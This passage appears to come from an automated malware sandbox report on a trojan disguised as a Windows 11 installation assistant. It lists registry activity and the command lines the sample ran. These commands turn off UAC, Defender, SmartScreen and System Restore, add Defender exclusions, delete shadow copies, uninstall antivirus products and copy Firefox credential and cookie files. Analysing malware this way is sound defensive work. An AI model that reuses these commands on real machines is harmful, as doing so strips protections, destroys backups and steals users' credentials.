| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
cURL User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | curl/8.7.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp" /SL5="$501BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp" /SL5="$601BE,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\pik.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\tmp\.cmd" "
C:\Windows\system32\reg.exe
rEg Add "hKLm\sOftWare\microsOfT\windOws\CurrentVersiOn\polICIEs\sysTem" /v "COnsenTPrompTbEhAvIoradmin" /T rEG_dWOrd /d "0" /F
C:\Windows\system32\reg.exe
reg add "hKlm\sOfTwArE\miCrosoFt\WindoWs\currEntVersIon\PoLiCIes\sysTem" /v "COnsEnTPromptbehavIOrUser" /t reG_dWord /d "0" /f
C:\Windows\system32\reg.exe
rEg add "hKLm\soFtwArE\micrOsofT\WIndOWs\cUrrenTVersiOn\pOliCIes\system" /V "PromPTOnsECUredesKtoP" /t reG_dWOrd /d "0" /f
C:\Windows\system32\reg.exe
reg add "hkLm\soFtwArE\PoliCIes\micrOsoFt\WIndows dEFender\spYneT" /v "sUBmITsAmPlEsConsEnt" /t reg_dWord /d "2" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\softwAre\POlicIes\micrOsOfT\Windows dEfEnder\spyneT" /V "sPynetrePOrTIng" /t rEg_dwOrd /d "0" /f
C:\Windows\system32\reg.exe
reG Add "hKlm\sOftwArE\pOlIcies\micrOsOFT\WIndOws dEFEndEr" /v "pUAproteCTiOn" /T rEG_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEg add "hklm\sOfTware\PolIcIEs\micrOsofT\wIndOws dEfendEr\mPenGinE" /v "mpenABlEpUs" /T reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTwAre\pOLiCIEs\miCrosoFT\WindoWs\sYstEm" /v "EnABLesmArTsCrEen" /t reG_dword /d "0" /F
C:\Windows\system32\reg.exe
reG Add "hKlm\sOFTWare\mIcrosoFT\windoWs\cUrrEntVErsiOn\eXPLOrer" /V "smArtscreenEnAblEd" /T reG_sz /d "off" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOftware\PoLiciEs\microsoFT\mrt" /V "donTofFerthrOuGhWUAU" /T "reG_dwOrd" /d "1" /f
C:\Windows\system32\reg.exe
rEG Add "hklm\sOFTWare\polIcies\mICrOsoFt\mrt" /V "dontrEportInfECTIOnInFormAtion" /T "rEg_dWord" /d "1" /f
C:\Windows\system32\reg.exe
reG add "hKlm\sOFtWAre\poLICies\mIcrosoft\WindoWs defendEr\uX configuration" /V "notIficatIon_suPPrEss" /t reG_dwOrd /d "1" /f
C:\Windows\system32\reg.exe
rEG add "hklm\sOfTWArE\PoliCiEs\miCrosoFT\wIndoWs deFEndEr\WIndows deFender eXplOIT GUArd\ConTrolLed fOLdEr acCess" /v "enablEContrOlledfOLdEracCess" /t reg_dWord /d "0" /F
C:\Windows\system32\reg.exe
reG add "hkLm\soFTWare\PoLicies\microsOFT\wIndOws dEfEndEr\rEpOrTInG" /v "dIsAblEEnhAncednOtIFicaTiOns" /T rEG_dword /d "1" /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions" /V "dIsablEEnhAncEdnOtiFiCatiOns" /t rEg_dWord /d "1" /F
C:\Windows\system32\reg.exe
reg add "hKLm\softWarE\mIcrosOFt\wIndows dEfender securitY centEr\vIrUs and ThreAT ProtECtIOn" /v "FIlesBLocKednOTIfiCAtiOndIsablEd" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
rEG Add "hkLm\sofTware\miCrOsOFt\WIndoWs defEnder seCUriTY centEr\VIrus and threAT proTectiOn" /V "nOaCTIOnnOTIFiCAtIOndIsaBLed" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
reG add "hkLm\softwAre\mIcrosOFT\WindOWs dEfEnder sECUriTy center\virUs And ThrEAt PrOteCTIon" /v "summarynOtIfIcaTIOndIsABled" /t rEG_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reg add "hklm\sOftwAre\PolICiEs\miCrOsofT\wIndows\exPlorEr" /V "dIsABLEnOtIFICaTIoncenTer" /T rEG_dWord /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hkCu\sOFtWarE\micrOsOFT\wIndOWs\currenTVersIOn\PUshnOTIfICatIOns" /v "ToastEnablEd" /t rEg_dWord /d "0" /f
C:\Windows\system32\reg.exe
reg Add "hKLm\soFtwarE\pOlicIes\micrOsOfT\wIndOWs dEfEnder sEcuritY CEnter\VIrUs And ThrEAT prOTECTion" /v UIlOCKdOWn /T rEG_dWOrd /d 1 /f
C:\Windows\system32\reg.exe
rEg add "hKlm\softWArE\POlICiEs\miCrOsofT\wIndOWs dEfEndEr seCUrItY cenTEr\ApP and Browser prOtEction" /V uIloCkdoWn /T rEg_dword /d 1 /f
C:\Windows\system32\reg.exe
reG add "hklm\sOFtWarE\POliCiEs\microsofT\wIndows nT\sysTEmrestorE" /V "disAblECOnfIG" /T reG_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKLm\soFtWAre\POLIcIes\mICrOsOFT\wIndows nT\sYsTemresTore" /v "disabLEsr" /T rEg_dword /d "1" /F
C:\Windows\system32\reg.exe
rEG add "hKcU\sOFTWare\mIcrosOFT\WIndoWs\CUrrenTvErsIon\poLiCiEs\aTTaChmenTs" /V "sAvezOnEInformATiOn" /T rEg_dwOrd /d "1" /F
C:\Windows\system32\reg.exe
reG add "hKLm\sOfTWarE\mICrosOft\windOWs\CurrEnTvErsIon\POLiCIes\AtTachments" /V "sAvEzoneinfOrmATiOn" /T reg_dword /d "1" /f
C:\Windows\system32\reg.exe
rEg Add "hKlm\soFTWArE\micrOsoFt\windOws\cUrrenTversiOn\POliciEs\AttachmEnTs" /v "scAnwithantivIrus" /t rEG_dwOrd /d "1" /f
C:\Windows\system32\icacls.exe
icaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /remOve:d "EvErYOnE" /t /C
C:\Windows\system32\icacls.exe
iCaCLs "C:\Users\Admin\AppData\Roaming\micROSOFT\WiNdOws\StaRt mENu\PrOgRAMs\STaRTuP" /denY "eVEryOnE":(dE,dC) /t /c
C:\Windows\system32\vssadmin.exe
vssadmin dELETe shadOws /aLl /QuIEt
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\attrib.exe
aTTrIb +S +H C:\TMP
C:\Windows\system32\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="ESET Security" call uninstall /nointeractive
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
C:\Windows\SysWOW64\curl.exe
CUrL -S ipINFO.io/Ip
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ob7cfhzse9oqu7xo240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\zx14njk1cjdm240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\4a7e2c0lq5gi240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\i8isbple5q9z240651515.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/b2bi5a2x.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\4tcj2ww5i240651515.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\m0eesb0kzpngmd240661625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/b2bi5a2x.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\c6lq96fwvpih240661625.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\9dv01842bcf3zfv240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\q2rescb6240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\434n2sz6anbo50bs240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\qrr2ejo103240683609.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/enjqfdim.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\2rjjl1u3y2240683609.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\67koeg4x240690375.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/enjqfdim.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y63thibysbnp6i240690375.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
